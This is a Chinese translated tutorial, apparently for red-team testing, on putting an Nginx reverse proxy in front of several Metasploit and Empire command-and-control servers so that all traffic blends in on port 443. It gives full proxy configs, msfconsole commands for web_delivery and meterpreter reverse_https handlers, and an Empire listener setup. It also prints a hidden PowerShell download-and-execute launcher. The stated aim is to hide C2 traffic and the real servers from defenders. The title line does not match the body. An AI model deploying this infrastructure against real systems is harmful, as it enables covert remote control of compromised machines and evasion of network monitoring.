代理服务器ip地址和端口号,代理服务器

翻译：WisFree

预估稿费：200RMB（不服你也来投稿啊！）

投稿方式：发送邮件至linwei#360.cn，或登陆网页版在线投稿

基础知识

目前流行的指挥控制(CC)工具大多通过HTTP传输网络通信数据，如Metasploit和Empire。对于CC工具来说，HTTP协议是比较高效的选择，主要是因为它适用于目前几乎所有类型的通信网络和网络设备。此外，使用“HTTP over TLS”可以为这些工具增加额外的安全层，因为这项技术将使我们更难检测CC流量。如果企业或组织有正确配置的网络代理，该代理可以执行SSL/TLS检查，这将有助于安全技术人员更好地检测CC流量。然而，在我帮助测试的组织中，采取这种安全措施的并不多。

为了掩盖所有非法操作，通过HTTP协议传输的CC流量应该通过端口80或端口443发送。如果用8080这样的特殊端口发送CC数据，不仅会引起管理员的怀疑，还会逃过安全防护软件的检测。我个人喜欢在同一台主机上使用多种类型的工具。如果我想在一台主机上使用帝国和Metasploit的网络传输模块，我总共需要三个网络端口。一般来说，我会选择使用端口80、端口8080和端口443。但是现在，我希望所有的网络流量都通过端口443发送。因此，我现在将使用剑盾提供的安全分析服务，这样我就可以使用CC代理来完成所有的分析操作。

接下来，我计划使用Nginx构建一个反向代理服务器。如下图所示，我们可以使用一个Web服务器同时处理多用户多工具的情况。代理服务器配置完成后，代理规则将负责划分发送到C2服务器端口的流量。此外，这种配置还可以隐藏CC服务器的“真实身份”(实际主机)。Nginx不仅安装配置非常简单，操作起来也非常方便。多用户多工具CC代理的架构图如下图所示：

Nginx的安装与配置

首先，在VPS服务器上安装你喜欢的Linux发行版，如果你愿意，也可以安装在自己的服务器上。为了大家的方便，我选择在一台VPS主机上安装Ubuntu 16.10。如果学生在安装和操作Nginx时遇到困难，请参考本教程【教程获取】。配置后，我的服务器只启用了端口80，只允许通过端口443发送网络流量。

在测试开始之前，我们必须配置Nginx，否则代理服务器将不知道如何处理那些通信连接。为了防止暴力攻击，我们需要为每个分析器分配一个GUID。您可以单击此处生成相应的GUID。我生成的GUID如下表所示：

我总共设置了三个分析器，每一个分析器的相关配置信息如下所示：

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657 #Analyst 1location /E0922BB0-684B-4ED3-967E-85D08880CFD5/ { proxy_redirect off; #Empire location /E0922BB0-684B-4ED3-967E-85D08880CFD5/e/ { proxy_pass https://205.232.71.92:443; } #Metasploit location /E0922BB0-684B-4ED3-967E-85D08880CFD5/m/ { #Metasploit exploit/multi/script/web_delivery location /E0922BB0-684B-4ED3-967E-85D08880CFD5/m/Delivery { proxy_pass https://205.232.71.92:8080; } #Metasploit Payload windows/x64/meterpreter/reverse_https location /E0922BB0-684B-4ED3-967E-85D08880CFD5/m/Pwned { proxy_pass https://205.232.71.92:80; } }}#Analyst 2location /30061CD8-0CEE-4381-B3F8-B50DCACA4CC8/ { proxy_redirect off; #Empire location /30061CD8-0CEE-4381-B3F8-B50DCACA4CC8/e/ { proxy_pass https://1.2.3.5:443; } #Metasploit location /30061CD8-0CEE-4381-B3F8-B50DCACA4CC8/m/ { #Metasploit exploit/multi/script/web_delivery location /30061CD8-0CEE-4381-B3F8-B50DCACA4CC8/m/Delivery { proxy_pass https://1.2.3.5:8080; } #Metasploit Payload windows/x64/meterpreter/reverse_https location /30061CD8-0CEE-4381-B3F8-B50DCACA4CC8/m/Pwned { proxy_pass https://1.2.3.5:80; } }}#Analyst 3location /6012A46E-C00C-4816-9DEB-7B2697667D92/ { proxy_redirect off; #Empire location /6012A46E-C00C-4816-9DEB-7B2697667D92/e/ { proxy_pass https://1.2.3.6:443; } #Metasploit location /6012A46E-C00C-4816-9DEB-7B2697667D92/m/ { #Metasploit exploit/multi/script/web_delivery location /6012A46E-C00C-4816-9DEB-7B2697667D92/m/Delivery { proxy_pass https://1.2.3.6:8080; } #Metasploit Payload windows/x64/meterpreter/reverse_https location /6012A46E-C00C-4816-9DEB-7B2697667D92/m/Pwned { proxy_pass https://1.2.3.6:80; } }}

由于我们要让Nginx需要区分出Metasploit和Empire的请求，所以我突发奇想，打算用‘m’来代表Metasploit，用‘e’来代表Empire。Empire的C2请求如下所示：

1	`https://myc2proxy.com/E0922BB0-684B-4ED3-967E-85D08880CFD5/e/index.asp`

现在，既然我们已经可以确定传入的HTTP请求所使用的语句了，那么Nginx就需要将每一个请求转发至适当的分析代理服务器中，这项操作可以使用Nginx配置文件（/etc/nginx/sites-enabled/default）中的定位指令来完成。在这篇文章中，我们要为每一个分析器分别设置四个定位指令。在上面这段代码中，最外层的指令将会与分析器的GUID进行匹配。内层的定位指令主要用来匹配针对特定工具的请求，例如‘e’（Empire）和‘m’（Metasploit）。Metasploit的定位指令包含两个子定位指令，这两个指令可以用来匹配传入Metasploit特定模块和监听器的网络请求。

现在，C&C代理服务器应该配置完成并且可以正常运行了。如果配置无误的话，我们将只能使用TLS连接和端口443来与服务器进行通信。

Metasploit的安装与配置

众所周知，Metasploit提供了很多的功能模块，我们可以使用这些模块来与目标用户的计算机建立C2连接。我个人比较喜欢使用“exploit/multi/script/web_delivery”模块来作为launcher。我之所以非常喜欢这个模块，主要是因为它可以将meterpreter（ShellCode）注入至目标主机的内存中。这是一种非常理想的情况，因为你可以直接使用目标主机中的内置工具来进行操作，而不必向目标主机发送任何的文件。

接下来，我们要加载Nginx配置文件所需要使用的Metasploit模块，并使用URIPATH来对其进行设置。需要注意的是，自带的payload handler必须被禁用，因为我们要单独配置这些payload。在配置这个模块的过程中，payload使用的是“windows/x64/meterpreter/reverse_https”，然后将LHOST和LPORT设置为C2代理服务器的IP地址和端口号。请注意，这里可千万不要设置成后台C2服务器的IP地址了。除此之外，我们还要设置与payload（例如Pwned）和Nginx中的指令相匹配的LURI。虽然相应的监听器根本不会启动，但我们仍然要去配置这些payload。因为接下来当模块被执行之后，我们要使用这些设置来生成显示在屏幕中的启动命令。我们可以将下面给出的这段指令直接复制粘贴到msfconsole中来配置并启动该模块：

12345678910 use exploit/multi/script/web_deliveryset URIPATH /E0922BB0-684B-4ED3-967E-85D08880CFD5/m/Deliveryset DisablePayloadHandler trueset SSL Trueset TARGET 2set payload windows/x64/meterpreter/reverse_httpsset LHOST myc2proxy.comset LPORT 443set LURI /E0922BB0-684B-4ED3-967E-85D08880CFD5/m/Pwnedrun –j

下图显示的是Metasploit中web_delivery模块的配置信息：

当模块被执行后，屏幕中会显示一个包含有启动代码的字符串。请注意：必须将网络端口由8080改为443，否则之后将无法再进行修改了。除此之外，我们还必须手动去修改，因为我们的C2代理只会接受来自端口443的通信请求。这个字符串如下所示：

1 powershell.exe -nop -w hidden -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$o=new-object net.webclient;$o.proxy=[Net.WebRequest]::GetSystemWebProxy();$o.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $o.downloadstring('https://myc2proxy.com:8080/E0922BB0-684B-4ED3-967E-85D08880CFD5/m/Delivery');

接下来，将LHOST设置为0.0.0.0，LPORT设置为80（端口号的设置可以根据后台C2服务器来选择）。我们还需要配置OverrideLHOST、OverrideLPORT、以及OverrideRequestHost来确保payload可以直接与C2代理服务器进行对话。我们可以将下面给出的命令直接复制粘贴到msfconsole中来配置并启动该模块：

12345678910 use exploit/multi/handlerset payload windows/x64/meterpreter/reverse_httpsset LHOST 0.0.0.0set LPORT 80set LURI /E0922BB0-684B-4ED3-967E-85D08880CFD5/m/Pwnedset OverrideLHOST myc2proxy.comset OverrideLPORT 443set OverrideRequestHost trueset ExitOnSession falserun –j

下图显示的是reverse_https的payload配置信息：

Empire的安装与配置

虽然Empire是我最喜欢的一款工具，但是在配置代理服务器的过程中，使用Empire之前还是有几个障碍需要克服的，相比之下Metasploit的配置和使用就简单多了。在PowerShell v1中，初始链接序列所使用STAGE0、STAGE1和STAGE2是在empire.db的配置表中定义的。在我看来，我们是无法在Empire CLI中修改这部分数据的，所以我们必须直接手动修改数据库。但是，PowerShell Empire v2并没有使用这种架构。我建议各位同学使用git来下载Empire v2分支，命令如下：

1	`cd /opt;git clone -b 2.0_beta https://github.com/adaptivethreat/Empire.git`

下载完成之后，启动应用。由于Empire监听器所使用的端口必须与C2代理服务器的监听端口相同，所以Empire必须使用端口443和HTTPS协议。我们可以直接将下面给出的这段命令复制粘贴进Empire中来配置监听器：

123456789 listenersuselistener httpset DefaultProfile /E0922BB0-684B-4ED3-967E-85D08880CFD5/e/admin/get.php,/E0922BB0-684B-4ED3-967E-85D08880CFD5/e/news.asp,/E0922BB0-684B-4ED3-967E-85D08880CFD5/e/login/process.jsp|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0;rv:11.0) like Geckoset Name EmpireC2set CertPath /opt/Empire/data/empire.pemset Host https://myc2proxy.comset Port 443executelauncher powershell

Empire监听器的配置信息如下图所示：